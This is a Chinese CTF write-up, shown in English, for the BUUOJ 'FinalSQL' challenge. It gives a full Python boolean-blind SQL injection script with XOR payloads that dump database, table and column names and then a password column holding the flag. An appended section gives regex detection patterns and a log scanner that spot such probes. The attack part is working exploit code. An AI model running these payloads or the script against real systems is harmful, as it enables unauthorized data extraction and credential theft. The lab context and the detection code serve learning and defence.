[极客大挑战 2019]FinalSQL
Opening the challenge shows this page. The universal-password trick did not work, but the author also hints here that this is a blind injection. The injection point is the page reached by clicking 神秘代码1 ("mysterious code 1"); trying ?id=1^(1==1)^1 there gives a normal response, which shows that injection is possible.
I used a script written by someone else here, since blind injection really takes too much time to do by hand. There are other, more concise scripts online, but they were not very stable when I ran them, and the column names they extracted were sometimes wrong. This one uses three payloads per step; it looks a bit clumsy, but it is reliable.
import requests

s = requests.session()
url = "http://7ceca060-f463-4e2b-9aff-bc77774807fe.node4.buuoj.cn/search.php"
table = ""
for i in range(1, 300):
    print(i)
    # Binary search over the printable ASCII range for the i-th character
    high = 128
    low = 31
    while low <= high:
        mid = (low + high) // 2
        # Dump database names
        # 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1)^1
        payload11 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))=%d)^1" % (i, mid)
        payload12 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d)^1" % (i, mid)
        payload13 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
        # Dump table names
        # payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1" % (i, mid)
        # payload11 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1" % (i, mid)
        # payload12 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))<%d)^1" % (i, mid)
        # payload13 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, mid)
        # Dump column names
        # payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1" % (i, mid)
        # payload11 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1" % (i, mid)
        # payload12 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))<%d)^1" % (i, mid)
        # payload13 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" % (i, mid)
        # Dump column values
        # payload4 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1" % (i, mid)
        # payload11 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1" % (i, mid)
        # payload12 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i, mid)
        # payload13 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
        ra11 = s.get(url=url + "?id=" + payload11).text
        ra12 = s.get(url=url + "?id=" + payload12).text
        ra13 = s.get(url=url + "?id=" + payload13).text
        if 'Click' in ra11:
            # Equal: this character is found
            table += chr(mid)
            print(table)
            break
        if 'Click' in ra12:
            # Less than mid: search the lower half
            # print("'low='+%d + 'high=' + %d" % (low, high))
            high = mid - 1
        if "Click" in ra13:
            # Greater than mid: search the upper half
            # print("'low='+%d + 'high=' + %d" % (low, high))
            low = mid + 1
First dump the database name. I guessed it was geek; alternatively use "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i, mid).
Then dump the table names. I first assumed the flag was in Flaaaaag, but as I went on I realized that was wrong (a sneaky challenge author).
Dump the column names in F1naI1y.
Finally dump password and find the flag.
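From the defender's side, the probing described above leaves a recognizable shape in web server access logs: many near-identical requests whose id parameter wraps an ascii(substr(...)) comparison in an XOR and reads from information_schema. The following is an added example, not part of the original write-up, that scores query parameters against those signatures over constructed log lines; the log format, client addresses and the score threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the challenge server): two
# boolean-blind probes of the shape shown in the write-up and two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))%3E64)%5E1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))%3C96)%5E1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?id=2 HTTP/1.1" 200 512
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the binary-search probe used on this page: an XOR wrapper around
# a comparison on ascii(substr(...)) that reads from information_schema.
SQLI_PATTERNS = [
    re.compile(r'\^\s*\(', re.I),                      # 1^( ... )^1 wrapper
    re.compile(r'ascii\s*\(\s*substr', re.I),          # per-character comparison
    re.compile(r'information_schema\.', re.I),         # schema enumeration
    re.compile(r'(?:select|from|group_concat)\s*\(', re.I),
]

def score_param(value: str) -> int:
    """Return how many probe signatures one (possibly URL-encoded) parameter value matches."""
    decoded = unquote(value)
    return sum(1 for p in SQLI_PATTERNS if p.search(decoded))

def analyse_log(text: str, threshold: int = 2):
    """Parse access-log lines; return ({ip: suspicious request count},
    {ip: sorted parameter names probed}) for requests scoring >= threshold."""
    hits = Counter()
    params_seen = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for name, values in qs.items():
            if any(score_param(v) >= threshold for v in values):
                hits[m.group("ip")] += 1
                params_seen[m.group("ip")].add(name)
    return dict(hits), {ip: sorted(ps) for ip, ps in params_seen.items()}

if __name__ == "__main__":
    print(analyse_log(SAMPLE_LOG))  # ({'10.0.0.5': 2}, {'10.0.0.5': ['id']})
```

A burst of such requests from one client, each differing only in the position and comparison value, is the binary search itself; alerting on the count per client and parameter catches it long before a full table has been read.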